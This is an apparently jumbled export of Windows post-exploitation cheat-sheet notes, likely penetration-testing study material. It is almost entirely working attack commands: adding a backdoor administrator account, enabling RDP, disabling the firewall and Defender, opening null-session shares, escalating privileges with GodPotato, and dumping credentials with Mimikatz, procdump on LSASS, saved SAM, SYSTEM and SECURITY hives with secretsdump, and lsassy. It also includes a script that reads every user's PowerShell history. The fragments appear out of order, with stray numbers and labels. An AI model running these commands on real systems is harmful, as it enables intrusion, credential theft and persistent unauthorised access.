net user aslam Password123! /add
net localgroup Administrators aslam /add
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
.\
example:
on a shell as localadmin:
.\weaken.bat
on a system with SeImpersonatePrivilege:
.\GodPotato-NET4.exe -cmd "cmd /c C:\Users\Public\share\weak.bat"
xfreerdp allows you to sign in using hashes and domain accounts
xfreerdp /v:ms01 /u:backdoor /p:Password123! +clipboard /cert:ignore
this may tell you another user is signed in, do you want to sign in anyway? select yes
alternatively, you can use rdesktop
rdesktop ms01
Enable Network Sharing:
1. Manage Advanced sharing settings
2. Turn on sharing
Create Share:
1. Right click -> properties
2. Sharing
3. Share
4. Everyone : R,W
(SAM) creds
1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
Cached credentials
2
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
reg add "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v restrictnullsessaccess /t REG_DWORD /d 0 /f
net stop LanmanServer
net start LanmanServer
netsh advfirewall set allprofiles state off
disable firewall
enable shares
Shares via gui
net localgroup administrators aslam /add
Weaken the system
weaken.bat
enable rdp
net user aslam Password123! /add
TIP
If you have localadmin or system on the target machine, you likely have the ability to weaken the system.
- Open ports, Enable RDP, Enable file shares etc.,
This may make things easier moving forward
powershell exec
add localadmin user
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
You need command execution as admin/system to perform some of the listed commands/scripts
Set-ExecutionPolicy Unrestricted
disable defender
Set-MpPreference -DisableRealTimeMonitoring $True
users' home
3
TIP
Repeat the steps for all users on the system
Filesystem breadcrumbs
win.old/backup FS
interesting files
"password" in file
PS trasncript
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
Console history
Enumerate drives
Get-ChildItem -Path C:\ -Include *.kdbx,*.pdf,*.txt,*.doc,*.docx,*.xml -File -Recurse -ErrorAction SilentlyContinue
manual
PS history
dir C:\
File system enum
1
6
5
gui
Event logs
ssh keys
other reg
PS
reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"
4
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
auto/winpeas
Registry keys
pwd search
putty creds
win+r+eventvwr.msc
Event ID: 4674
Event ID: 4624
Event ID: 4672
reg query HKLM /f password /t REG_SZ /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername"
reg query HKCU /f password /t REG_SZ /s
lsadump::lsa /inject
secresdump
Mimikatz
Invoke-Mimikatz -Command '"lsadump::sam"'
Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
Creds in memory
dir env:
PS
cmd
set
2
Environment
Get-ChildItem -Path C:\windows.old -Include *SAM,*SYSTEM,*SECURITY,*.kdbx,*doc,*xml,*config -File -Recurse -ErrorAction SilentlyContinue
tree C:\Users /f
findstr /si password *.xml *.ini *.txt
as a localadmin, you can loop through all users' PS history. This bat script automates the process
@echo off
setlocal
:: Loop through each folder in C:\Users
for /D %%u in (C:\Users\*) do (
set "userfolder=%%~nxu"
:: Check if the PSReadline history file exists for this user
if exist "%%u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" (
echo User: %%~nxu
echo ------------------------------
type "%%u\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
echo.
)
)
endlocal
PSHistory.bat
cat (Get-PSReadlineOption).HistorySavePath | sls passw
cat (Get-PSReadlineOption).HistorySavePath
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
Get-WinEvent -FilterHashtable @{LogName='*'} | Where-Object { $_.Message -match 'password' }
.\winPEASx64.exe fileanalysis
.\winPEASx64.exe filesinfo
.\winPEASx64 windowscreds
Get-Process -Name LSASS
.\procdump.exe -ma <ProcNum> lsass.dmp
lsassy -u <USER> -H <NTLM> -d <domain.full> $ip --users
reg save HKLM\sam sam
Invoke-Mimikatz -Command '"vault::cred /patch"'
Mimikatz
3
Scheduled Tasks
impacket-secretsdump -sam sam -system system LOCAL
reg save HKLM\security security
reg save HKLM\system system
impacket-secretsdump -sam sam -security security -system system LOCAL